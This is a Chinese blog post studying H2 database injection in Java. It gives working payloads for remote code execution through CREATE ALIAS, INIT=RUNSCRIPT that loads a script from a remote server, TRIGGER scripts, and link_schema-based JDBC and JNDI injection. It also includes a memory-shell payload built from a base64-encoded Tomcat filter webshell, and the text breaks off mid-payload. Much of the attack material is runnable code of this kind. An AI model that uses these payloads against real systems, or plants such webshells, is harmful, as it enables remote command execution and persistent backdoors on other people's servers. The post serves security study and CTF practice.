JavaSec | H2数据库注入学习-海口c网

前言

前置学习

　　介绍

　　环境搭建

　　demo

漏洞分析

　　RCE

　　　Alias Script RCE

　　　INIT RunScript RCE

　　　TRIGGER Script RCE

　　高版本JDK下的RCE

　　文件读取

　　写文件

　　JDBC

　　JNDI

　　内存马

例题

　　[N1CTF Junior 2025]EasyDB

参考

前言

在学 Spring 框架的利用时发现很多用的是用的 H2 数据库，就来学习一下相关的利用手法

前置学习

介绍

H2 是一个用 Java 开发的嵌入式数据库（如 Spring Boot 默认使用 H2），它本身只是一个类库，即只有一个 jar 文件，可以直接嵌入到应用项目中。H2 主要有如下三个用途：

1. 第一个用途，也是最常使用的用途就在于可以同应用程序打包在一起发布，这样可以非常方便地存储少量结构化数据。
2. 第二个用途是用于单元测试。启动速度快，而且可以关闭持久化功能，每一个用例执行完随即还原到初始状态。
3. 第三个用途是作为缓存，即当做内存数据库，作为NoSQL的一个补充。当某些场景下数据模型必须为关系型，可以拿它当Memcached使，作为后端MySQL/Oracle的一个缓冲层，缓存一些不经常变化但需要频繁访问的数据，比如字典表、权限表。

环境搭建

pom.xml 中加

<dependencies><!-- https://mvnrepository.com/artifact/com.h2database/h2 --><dependency><groupId>com.h2database</groupId><artifactId>h2</artifactId><version>2.0.204</version><scope>compile</scope></dependency></dependencies>

也有 ui 界面的，下面直接用代码分析了

demo

写个连接的demo

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Properties;public class demo {public static void main(String[] args) {String DRIVER_CLASS = "org.h2.Driver"; //H2 JDBC 驱动的类名String JDBC_URL = "jdbc:h2:mem:test_any"; // 使用内存数据库Properties info = new Properties();info.setProperty("user", "sa");info.setProperty("password", "");try {Class.forName(DRIVER_CLASS); // 加载驱动类try (Connection conn = DriverManager.getConnection(JDBC_URL, info)) {System.out.println("连接成功！");}} catch (ClassNotFoundException | SQLException e) {e.printStackTrace();}}
}

JDBC_URL：连接数据库，这里是 h2 数据库，所以格式是 jdbc:h2:<数据库位置>

• mem:testdb 表示使用内存数据库（程序结束后数据消失）。
• 若写为 jdbc:h2:./test，就变成文件数据库，保存在本地。

在 h2 中，默认用户 sa 的密码为空

创建表然后查询下

import java.sql.*;
import java.util.Properties;public class create_demo {public static void main(String[] args) {String DRIVER_CLASS = "org.h2.Driver";String JDBC_URL = "jdbc:h2:mem:test_any1";Properties info = new Properties();info.setProperty("user", "sa");info.setProperty("password", "");try {Class.forName(DRIVER_CLASS);try (Connection conn = DriverManager.getConnection(JDBC_URL, info);Statement stmt = conn.createStatement()) {System.out.println("连接H2数据库成功！");// 创建test表stmt.execute("CREATE TABLE test (" +"id INT PRIMARY KEY, " +"username VARCHAR(50), " +"age INT)");System.out.println("表test创建成功");// 插入数据stmt.executeUpdate("INSERT INTO test (id, username, age) VALUES " +"(1, 'bob', 11), " +"(2, 'john', 12)");System.out.println("数据插入成功");// 查询验证System.out.println("\n当前表中的数据：");ResultSet rs = stmt.executeQuery("SELECT * FROM test");while (rs.next()) {System.out.printf("id=%d, username=%s, age=%d%n",rs.getInt("id"),rs.getString("username"),rs.getInt("age"));}}} catch (ClassNotFoundException | SQLException e) {System.err.println("发生错误:");e.printStackTrace();}}
}

conn.createStatement() 创建一个 Statement 对象，用于执行 SQL 语句，其他就是些基础的 sql 语句，不多说，每个操作用到的函数不同，比如插入数据时用 executeUpdate ，实现查询语句时用 executeQuery

漏洞分析

RCE

Alias Script RCE

如果可以执行任意 sql 语句，可以写个自定义函数，这个函数跟 exec 有同样的作用的话就能 rce，和 mysql 数据库中的 udf 一个道理

//创建别名
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;//调用SHELLEXEC执行命令
CALL SHELLEXEC('id');
CALL SHELLEXEC('whoami');

创建自定义函数时用的是 execute

INIT RunScript RCE

在H2数据库进行初始化的时候或者当我们可以控制JDBC链接时即可完成RCE，并且有很多利用，首先就是INIT，进行H2连接的时候可以执行一段SQL脚本，我们可以构造恶意的脚本去RCE

poc.sql

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "test";}';CALL EXEC ('calc')

payload

jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'http://127.0.0.1:9090/poc.sql'

TRIGGER Script RCE

payload

//groovy
Class.forName("org.h2.Driver");
String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec(\"calc\")" + "})" + "def x";
String JDBC_URL    = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'";//js        
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +"INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +"java.lang.Runtime.getRuntime().exec('calc.exe')\n" +"$$\n";

除了 Alias 别名还可以用 TRIGGER 去手搓 groovy 或者 js 代码去 rce，但是 groovy 依赖一般都是不会有的，所以 js 是更加通用的选择，这里将 poc.sql 简化成了一句话而且还不用远程环境交互（不需要指定 MODE 也能成功，大多数 H2 版本默认都支持这类执行行为）

Litch1 翻了 CREATE ALIAS 实现的源代码，发现在 SQL 语句中对于 JAVA 方法的定义被交给了源代码编译器。有三种支持的编译器：Java/Javascript/Groovy，但这貌似还有 ruby（但试了下 ruby，不行，应该要写特殊的依赖或配置）

根据传入的开头来看是哪种编译器，groovy 编译器是调用 GroovyCompiler.parseClass() 来解析 groovy 代码

js 编译器则是调用 org.h2.schema.TriggerObject#loadFromSource，不仅仅编译源代码，还调用了 eval 执行

高版本JDK下的RCE

在上面说到的 TRIGGER Script RCE 中，是依靠 js 来 rce 的，Nashorn 是默认内置的 JavaScript 引擎，但在 JDK 15+ 中，Nashorn 已被移除（除非手动引入）

payload

String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +"INFORMATION_SCHEMA.TABLES AS $$ void poc() throws Exception{ Runtime.getRuntime().exec(\"calc\")\\;}$$";

还是看到 org.h2.util.SourceCompiler#getClass

public Class<?> getClass(String var1) throws ClassNotFoundException {Class var2 = (Class)this.compiled.get(var1);if (var2 != null) {return var2;} else {String var3 = (String)this.sources.get(var1);if (isGroovySource(var3)) {Class var5 = SourceCompiler.GroovyCompiler.parseClass(var3, var1);this.compiled.put(var1, var5);return var5;} else {ClassLoader var4 = new ClassLoader(this.getClass().getClassLoader()) {public Class<?> findClass(String var1) throws ClassNotFoundException {Class var2 = (Class)SourceCompiler.this.compiled.get(var1);if (var2 == null) {String var3 = (String)SourceCompiler.this.sources.get(var1);String var4 = null;int var5 = var1.lastIndexOf(46);String var6;if (var5 >= 0) {var4 = var1.substring(0, var5);var6 = var1.substring(var5 + 1);} else {var6 = var1;}String var7 = SourceCompiler.getCompleteSourceCode(var4, var6, var3);if (SourceCompiler.JAVA_COMPILER != null && SourceCompiler.this.useJavaSystemCompiler) {var2 = SourceCompiler.this.javaxToolsJavac(var4, var6, var7);} else {byte[] var8 = SourceCompiler.this.javacCompile(var4, var6, var7);if (var8 == null) {var2 = this.findSystemClass(var1);} else {var2 = this.defineClass(var1, var8, 0, var8.length);}}SourceCompiler.this.compiled.put(var1, var2);}return var2;}};return var4.loadClass(var1);}}}

这里传入的值如果既不是 groovy 也是不 javascript ，H2 默认会将其当作 Java 源码处理，用 Javac 编译它，最后用 loadClass 加载这个类

调用栈

loadFromSource:113, TriggerObject (org.h2.schema)
load:87, TriggerObject (org.h2.schema)
setTriggerAction:149, TriggerObject (org.h2.schema)
setTriggerSource:142, TriggerObject (org.h2.schema)
update:125, CreateTrigger (org.h2.command.ddl)
update:173, CommandContainer (org.h2.command)
executeUpdate:252, Command (org.h2.command)
openSession:279, Engine (org.h2.engine)
createSession:201, Engine (org.h2.engine)
connectEmbeddedOrServer:338, SessionRemote (org.h2.engine)
<init>:117, JdbcConnection (org.h2.jdbc)
connect:59, Driver (org.h2)
getConnection:681, DriverManager (java.sql)
getConnection:190, DriverManager (java.sql)
main:25, rce_test

很简单，就是加载我们自己写的 java 代码，不需要任何引擎，INIT RunScript RCE 和 Alias Script RCE 也是一样的

文件读取

官方文档：https://www.h2database.com/html/functions.html#file_read

按照格式来就好了

写文件

还是看官方文档

第一个参数是写入值，第二个参数是写入文件地址

JDBC

用到的是 link_schema 函数

第二个参数是数据库驱动的名称，第三个参数是 jdbc 的连接地址，在连接的时候执行 sql 语句，这里用 INIT RunScript RCE 来打

String username = "bob' union select 1,2,3 from link_schema('any_test', '', 'jdbc:h2:mem:testdb1;INIT=RUNSCRIPT FROM ''http://127.0.0.1:9090/poc.sql''', 'sa', 'sa', 'PUBLIC')--";

JNDI

这里还是用的 link_schema 函数，根据到其实现类 org.h2.expression.function.table.LinkSchemaFunction 的 getValue 函数

JdbcUtils.getConnection 的 var3、var4 就是我们传入的数据库驱动的名称和 url 地址，跟进其实现

如果 url 是 jdbc:h2: 开头，就 jdbc 连接，如果不是就用 loadUserClass 加载，loadUserClass 中写明了所有类都允许加载，然后回到 JdbcUtils.getConnection 中，如果是加载的类 javax.naming.Context 类或其子类、实现类，就直接 lookup，

可以直接加载 javax.naming.InitialContext，打jndi , payload

String username = "bob' union select 1,2,3 from link_schema('any_test', 'javax.naming.InitialContext', 'ldap://127.0.0.1:1389/v6uu9g', 'sa', 'sa', 'PUBLIC')--";

这个对于 h2 依赖版本有限制，2.1.x全版本都有限制，2.0.x < 2.0.206 无限制

内存马

不出网的情况下方便 rce，写入本地文件中然后发起 jdbc 连接

poc.sql

CREATE ALIAS EXEC AS 'void e(String cmd) throws Exception{String evilClassBase64 = "yv66vgAAADQBTQoAIQC5CgC6ALsKALwAvQoAvAC+CgC6AL8KACEAwAoAwQC7BwDCCgAhAMMKAEgAxAoAIwDFCgDBAMYKAEkAxwoAyADJCgDIAMoHAMsIAH8KAEgAzAcAzQoAEwDOBwDPCADQBwDRCgAXAMcKABcA0ggA0woAFwDUBwDVCgAcAMcKABwA0goAHADWBwDXBwDYBwDZBwDaCgBIANsIAIoHANwKACYA3QoAFQDeCgAVAN8IAOALAOEA4gsA4wDkCADlCADmCgDnAOgKADQA6QgA6goANADrBwDsBwDtCADuCADvCgAzAPAIAPEIAPIHAPMKADMA9AoA9QD2CgA6APcIAPgKADoA+QoAOgD6CgA6APsKADoA/AoA/QD+CgD9AP8KAP0A/AsBAAEBBwECBwEDBwEEBwEFAQAVY3JlYXRlV2l0aENvbnN0cnVjdG9yAQBbKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBABJjbGFzc1RvSW5zdGFudGlhdGUBABFMamF2YS9sYW5nL0NsYXNzOwEAEGNvbnN0cnVjdG9yQ2xhc3MBAAxjb25zQXJnVHlwZXMBABJbTGphdmEvbGFuZy9DbGFzczsBAAhjb25zQXJncwEAE1tMamF2YS9sYW5nL09iamVjdDsBAAdvYmpDb25zAQAfTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAAnNjAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAFkxqYXZhL2xhbmcvQ2xhc3M8VFQ7PjsBABdMamF2YS9sYW5nL0NsYXNzPC1UVDs+OwEAFVtMamF2YS9sYW5nL0NsYXNzPCo+OwEAJUxqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjwtVFQ7PjsBACJMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I8Kj47AQAKRXhjZXB0aW9ucwEACVNpZ25hdHVyZQEAcDxUOkxqYXZhL2xhbmcvT2JqZWN0Oz4oTGphdmEvbGFuZy9DbGFzczxUVDs+O0xqYXZhL2xhbmcvQ2xhc3M8LVRUOz47W0xqYXZhL2xhbmcvQ2xhc3M8Kj47W0xqYXZhL2xhbmcvT2JqZWN0OylUVDsBAAhnZXRGaWVsZAEAPihMamF2YS9sYW5nL0NsYXNzO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQACZXgBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEABWNsYXp6AQAJZmllbGROYW1lAQASTGphdmEvbGFuZy9TdHJpbmc7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAUTGphdmEvbGFuZy9DbGFzczwqPjsBAA1TdGFja01hcFRhYmxlBwDYBwDtBwEGBwDCAQBBKExqYXZhL2xhbmcvQ2xhc3M8Kj47TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1nZXRGaWVsZFZhbHVlAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAAlmaWVsZG5hbWUBAAFvAQAGPGluaXQ+AQADKClWAQAEdGhpcwEADUxGaWx0ZXJTaGVsbDsBABV3ZWJhcHBDbGFzc0xvYWRlckJhc2UBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9sb2FkZXIvV2ViYXBwQ2xhc3NMb2FkZXJCYXNlOwEACXJlc291cmNlcwEAL0xvcmcvYXBhY2hlL2NhdGFsaW5hL3dlYnJlc291cmNlcy9TdGFuZGFyZFJvb3Q7AQAHY29udGV4dAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEACmZpbHRlck5hbWUBAAlmaWx0ZXJNYXABADFMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7AQAJZmlsdGVyRGVmAQAxTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyRGVmOwEAF2FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnAQAyTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9BcHBsaWNhdGlvbkZpbHRlckNvbmZpZzsBAA1maWx0ZXJDb25maWdzAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAWUxqYXZhL3V0aWwvSGFzaE1hcDxMamF2YS9sYW5nL1N0cmluZztMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnOz47AQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQABcAEAGkxqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXI7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAARhcmcwAQAHcmVxdWVzdAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEABWNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47BwEHBwDsBwDzBwEDBwEIBwEJBwEKBwECBwELBwEMAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcBDQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7AQAHZGVzdHJveQEAClNvdXJjZUZpbGUBABBGaWx0ZXJTaGVsbC5qYXZhDAEOAQ8HARAMAREBEgcBEwwBFAEVDAEWARcMARgBGQwBGgEbBwEGAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAEcAR0MAGMAZAwBHgEdDAEfASAMAHkAegcBIQwBIgEjDAEkASUBADBvcmcvYXBhY2hlL2NhdGFsaW5hL2xvYWRlci9XZWJhcHBDbGFzc0xvYWRlckJhc2UMAHMAdAEALW9yZy9hcGFjaGUvY2F0YWxpbmEvd2VicmVzb3VyY2VzL1N0YW5kYXJkUm9vdAwBJgEnAQAob3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dAEABWZmZmZmAQAvb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXAMASgBKQEAAi8qDAEqASkBAC9vcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZgwBKwEsAQAwb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnAQAPamF2YS9sYW5nL0NsYXNzAQAbb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0AQAQamF2YS9sYW5nL09iamVjdAwASwBMAQARamF2YS91dGlsL0hhc2hNYXAMAS0BLgwBLwEwDAExATIBAANjbWQHAQgMATMBNAcBCQwBNQE2AQAAAQAHb3MubmFtZQcBNwwBOAE0DAE5AToBAAN3aW4MATsBPAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMAHkBPQEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyDAE+AT8HAUAMAUEBQgwAeQFDAQACXEEMAUQBRQwBRgFHDAFIAToMAUkAegcBBwwBSgEpDAFLAHoHAQoMAI0BTAEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAtGaWx0ZXJTaGVsbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQATamF2YS9pby9QcmludFdyaXRlcgEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAWZ2V0RGVjbGFyZWRDb25zdHJ1Y3RvcgEAMyhbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAHWphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAB1zdW4vcmVmbGVjdC9SZWZsZWN0aW9uRmFjdG9yeQEAFGdldFJlZmxlY3Rpb25GYWN0b3J5AQAhKClMc3VuL3JlZmxlY3QvUmVmbGVjdGlvbkZhY3Rvcnk7AQAebmV3Q29uc3RydWN0b3JGb3JTZXJpYWxpemF0aW9uAQBRKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOylMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7AQALbmV3SW5zdGFuY2UBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANZ2V0U3VwZXJjbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAhnZXRDbGFzcwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAApnZXRDb250ZXh0AQAfKClMb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0OwEADXNldEZpbHRlck5hbWUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA1hZGRVUkxQYXR0ZXJuAQAJc2V0RmlsdGVyAQAZKExqYXZheC9zZXJ2bGV0L0ZpbHRlcjspVgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAMYWRkRmlsdGVyRGVmAQA0KExvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjspVgEADGFkZEZpbHRlck1hcAEANChMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7KVYBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEA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";byte[] bytes = java.util.Base64.getDecoder().decode(evilClassBase64);java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);method.setAccessible(true);((Class)method.invoke(ClassLoader.getSystemClassLoader(), "FilterShell", bytes, 0, bytes.length)).newInstance();}';
CALL EXEC('calc');

或者打 TRIGGER Script RCE

String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +"INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +"org.springframework.cglib.core.ReflectUtils.defineClass(\"InjectToController\",org.sp
ringframework.util.Base64Utils.decodeFromString(\"yv66vgAAADQA5QoAPQB2CgB3AHgHAHkKAAMAe
goAAwB7CAB8CwB9AH4LAH8AgAgAgQgAggoAgwCECgAQAIUIAIYKABAAhwcAiAcAiQgAiggAiwoADwCMCACNCACO
